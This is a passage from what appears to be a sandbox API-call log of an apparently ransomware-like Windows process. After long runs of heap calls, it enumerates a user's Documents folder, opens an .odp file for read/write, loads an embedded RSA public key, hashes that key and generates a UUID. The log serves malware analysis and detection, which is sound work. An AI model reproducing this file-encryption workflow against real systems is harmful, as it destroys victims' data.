dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.813] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\") returned="hfGoG8BRVBw\\" [0196.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0196.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.814] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\") returned="8NNLi0kOEoM-mpUM785\\" [0196.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea4a0 [0196.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0196.815] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0196.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea4a0 | out: hHeap=0x2c0000) returned 1 [0196.815] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.815] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.815] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.816] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.816] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.816] PathFindFileNameW (pszPath="") returned="" [0196.816] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\hfgog8brvbw\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3290cde0, ftCreationTime.dwHighDateTime=0x1d8a55a, ftLastAccessTime.dwLowDateTime=0x229f3950, ftLastAccessTime.dwHighDateTime=0x1d8a742, ftLastWriteTime.dwLowDateTime=0x229f3950, ftLastWriteTime.dwHighDateTime=0x1d8a742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0196.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.820] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3290cde0, ftCreationTime.dwHighDateTime=0x1d8a55a, ftLastAccessTime.dwLowDateTime=0x229f3950, ftLastAccessTime.dwHighDateTime=0x1d8a742, ftLastWriteTime.dwLowDateTime=0x229f3950, ftLastWriteTime.dwHighDateTime=0x1d8a742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.820] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e9f5c0, ftCreationTime.dwHighDateTime=0x1d89830, ftLastAccessTime.dwLowDateTime=0x950036c0, ftLastAccessTime.dwHighDateTime=0x1d8a350, ftLastWriteTime.dwLowDateTime=0x950036c0, ftLastWriteTime.dwHighDateTime=0x1d8a350, nFileSizeHigh=0x0, nFileSizeLow=0x553b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0sE02.odp", cAlternateFileName="")) returned 1 [0196.820] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\0sE02.odp") returned=".odp" [0196.820] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\hfGoG8BRVBw\\0sE02.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\hfgog8brvbw\\0se02.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.821] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=21819) returned 1 [0196.821] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.825] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5515, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.825] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.827] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.828] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.828] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x553b, lpOverlapped=0x0) returned 1 [0196.829] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.829] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.829] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.829] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.829] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b640) returned 1 [0196.831] CryptCreateHash (in: hProv=0x31b640, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.831] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.831] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.831] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.831] GetLastError () returned 0x0 [0196.831] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.831] CryptReleaseContext (hProv=0x31b640, dwFlags=0x0) returned 1 [0196.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.832] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.832] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.832] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5540) returned 0x2af5168 [0196.832] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea4a0 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6668 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea4e8 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6680 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66b0 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6710 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66c8 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.833] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0196.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0196.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6710 [0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66c8 [0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae66b0 [0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 